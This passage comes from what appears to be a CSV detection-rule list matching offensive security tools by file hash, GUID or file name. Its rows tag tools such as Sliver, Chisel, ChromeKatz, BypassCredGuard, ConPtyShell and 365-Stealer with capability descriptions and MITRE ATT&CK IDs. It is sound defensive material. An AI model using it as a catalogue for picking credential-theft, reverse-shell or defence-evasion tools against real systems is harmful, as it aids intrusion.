builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3422b5b6a7d4b662727baf8a4615c884a4295b71b8d0412130415b737a4cd216*",".{0,1000}3422b5b6a7d4b662727baf8a4615c884a4295b71b8d0412130415b737a4cd216.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*3425d6a0a29537eb9bc8e98680cff7dd16280122f59ef4eb03d7a48760c053a7*",".{0,1000}3425d6a0a29537eb9bc8e98680cff7dd16280122f59ef4eb03d7a48760c053a7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3461b057cfdf4259e44f40a0ad4490da3dd8ec511048f9eeac3dd224284a72d0*",".{0,1000}3461b057cfdf4259e44f40a0ad4490da3dd8ec511048f9eeac3dd224284a72d0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*349f76bc4ae2326df15117c4b0c20a5e8a0f3491e83e7ea15fdbd02d67e45e8e*",".{0,1000}349f76bc4ae2326df15117c4b0c20a5e8a0f3491e83e7ea15fdbd02d67e45e8e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3504F678-95FA-4DB2-8437-31A927CABC16*",".{0,1000}3504F678\-95FA\-4DB2\-8437\-31A927CABC16.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*35151960809a922f735b9492d55792b5cbcef5f3f47060ef484f92f63fe751a9*",".{0,1000}35151960809a922f735b9492d55792b5cbcef5f3f47060ef484f92f63fe751a9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*354a7236afe220e7c831129fbf32434edd1d18961118dfb05279ff5c1b6f38ad*",".{0,1000}354a7236afe220e7c831129fbf32434edd1d18961118dfb05279ff5c1b6f38ad.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - 
TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*354f17db4f3eeff8cbfd56f6aabea68deb7045572ba55298bbfb1e355c98a246*",".{0,1000}354f17db4f3eeff8cbfd56f6aabea68deb7045572ba55298bbfb1e355c98a246.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*355c68b197356e23687866e8ea8068ac29b62e3bb4657b9180729eebce44d7a9*",".{0,1000}355c68b197356e23687866e8ea8068ac29b62e3bb4657b9180729eebce44d7a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3560411a4c3ed8e9229e7684be1c002f39cdaa5482c6d5046984d4be7985a594*",".{0,1000}3560411a4c3ed8e9229e7684be1c002f39cdaa5482c6d5046984d4be7985a594.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*35678541d1d3a394875f58f3add9b097f445dc15de0a720318da1db4d1de06e8*",".{0,1000}35678541d1d3a394875f58f3add9b097f445dc15de0a720318da1db4d1de06e8.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*356fc0b7eacb629e745a774a22e5ed1f82aea70dc9bc420a1d71b9d28ef27830*",".{0,1000}356fc0b7eacb629e745a774a22e5ed1f82aea70dc9bc420a1d71b9d28ef27830.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*357b50be2506c10d74d5792d52cfd892155540741f3dbf270eefcffe6884fd14*",".{0,1000}357b50be2506c10d74d5792d52cfd892155540741f3dbf270eefcffe6884fd14.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*35cc4208d80e7a202cef1cf17f6a2d1a629400410eaccecdb70c3c85f79ec431*",".{0,1000}35cc4208d80e7a202cef1cf17f6a2d1a629400410eaccecdb70c3c85f79ec431.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*35d295a5f04094a88ddf9c0704c8555bcaf980d9eb15505549f2ace647324cd6*",".{0,1000}35d295a5f04094a88ddf9c0704c8555bcaf980d9eb15505549f2ace647324cd6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*35d9023ac28fe49540ae16d224a8edc09c97a12edfea883e48de778730cc2d3a*",".{0,1000}35d9023ac28fe49540ae16d224a8edc09c97a12edfea883e48de778730cc2d3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3622f69f847b1fd331363a847f626b9931363c81946b6d6e7441dc0959b4d971*",".{0,1000}3622f69f847b1fd331363a847f626b9931363c81946b6d6e7441dc0959b4d971.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*3655a757ef5f8d849bb61132c30e20848cd88ce2233abf1ca71e029ec7572fc4*",".{0,1000}3655a757ef5f8d849bb61132c30e20848cd88ce2233abf1ca71e029ec7572fc4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*365-Stealer.py*",".{0,1000}365\-Stealer\.py.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*365-Stealer-master*",".{0,1000}365\-Stealer\-master.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*366294485d6a2c872b0ebf033cb129a23ed2fce4ca2dc3e7905cb49a808ba7a6*",".{0,1000}366294485d6a2c872b0ebf033cb129a23ed2fce4ca2dc3e7905cb49a808ba7a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3688991da39646b2fb375ce860fc34e29341598abb35e10ddc9f4650460a1f2c*",".{0,1000}3688991da39646b2fb375ce860fc34e29341598abb35e10ddc9f4650460a1f2c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3697e7b61d4f49ead950dfcc75560c457c836fcbc9f81b15b2041eb2a7a5171c*",".{0,1000}3697e7b61d4f49ead950dfcc75560c457c836fcbc9f81b15b2041eb2a7a5171c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*36a659bab7eec62733d13b9e7f8a6ae891cfaf7cd2ec36824bf41f7e6b706944*",".{0,1000}36a659bab7eec62733d13b9e7f8a6ae891cfaf7cd2ec36824bf41f7e6b706944.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*36b45b5ab3cbd980c5ca2c3bd229525e7dd937a0eb2e53347dfa2671cf27d859*",".{0,1000}36b45b5ab3cbd980c5ca2c3bd229525e7dd937a0eb2e53347dfa2671cf27d859.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*36c6bc3f7f5efd96f7bf472d30119cf22142383adaf774b96732b27ecefe9159*",".{0,1000}36c6bc3f7f5efd96f7bf472d30119cf22142383adaf774b96732b27ecefe9159.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*36c88f1852f3c162bf64d973bb6f69ffb7e22503015e104716fc51eaddcbe875*",".{0,1000}36c88f1852f3c162bf64d973bb6f69ffb7e22503015e104716fc51eaddcbe875.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*36cbfc729051ef456ce4f71973619ce33c05ef4c3072a6cdf4e1ff555ab5a231*",".{0,1000}36cbfc729051ef456ce4f71973619ce33c05ef4c3072a6cdf4e1ff555ab5a231.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*",".{0,1000}36EBF9AA\-2F37\-4F1D\-A2F1\-F2A45DEEAF21.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. 
regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1711","251","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" "*36F9C306-5F45-4946-A259-610C05BD90DF*",".{0,1000}36F9C306\-5F45\-4946\-A259\-610C05BD90DF.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*36fa3d212c2159c8e1b769bed63fd12c77cdff60f3d13e0b36a554d8e82d6f17*",".{0,1000}36fa3d212c2159c8e1b769bed63fd12c77cdff60f3d13e0b36a554d8e82d6f17.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*370acf4cc5645e10b1633c5df10fd5331bef377ea731e3c97e05b5538b4266d5*",".{0,1000}370acf4cc5645e10b1633c5df10fd5331bef377ea731e3c97e05b5538b4266d5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*37189960f1e5e6efbc79bf55ef7ee6840cc639ce46905691f89850a950fbdd94*",".{0,1000}37189960f1e5e6efbc79bf55ef7ee6840cc639ce46905691f89850a950fbdd94.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*375b4f81c0ce1ab360c6f369c4bb2765ba3d683aae1f33250bdd1d1a79f9d31d*",".{0,1000}375b4f81c0ce1ab360c6f369c4bb2765ba3d683aae1f33250bdd1d1a79f9d31d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*375D8508-F60D-4E24-9DF6-1E591D2FA474*",".{0,1000}375D8508\-F60D\-4E24\-9DF6\-1E591D2FA474.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/MzHmO/DebugAmsi","1","0","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*376713183026ccc822e9c1dead28cc81c7cfa7ad1c88e368ada6c31ce3909a2e*",".{0,1000}376713183026ccc822e9c1dead28cc81c7cfa7ad1c88e368ada6c31ce3909a2e.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*3768f75f13bf1f58b77046be2174d666f05006a8a139cdca85bc5cd291a81fa8*",".{0,1000}3768f75f13bf1f58b77046be2174d666f05006a8a139cdca85bc5cd291a81fa8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3787435B-8352-4BD8-A1C6-E5A1B73921F4*",".{0,1000}3787435B\-8352\-4BD8\-A1C6\-E5A1B73921F4.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" 
"*379331177374643353a85fea9cd5934f1207a0fc6bb2370b658090240263ccbd*",".{0,1000}379331177374643353a85fea9cd5934f1207a0fc6bb2370b658090240263ccbd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*37da8267b295caeca8fadb13206ba1c498a7012673430c5d856fe93862446a28*",".{0,1000}37da8267b295caeca8fadb13206ba1c498a7012673430c5d856fe93862446a28.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*37f414a4928417fe375e6ba23c4028681bdfb1dd8d0130b20260caf3a4d33485*",".{0,1000}37f414a4928417fe375e6ba23c4028681bdfb1dd8d0130b20260caf3a4d33485.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*37f49e38ee8cc509bcae0842800b3d0c85072d6e56a8395aede48abeef0b9f28*",".{0,1000}37f49e38ee8cc509bcae0842800b3d0c85072d6e56a8395aede48abeef0b9f28.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 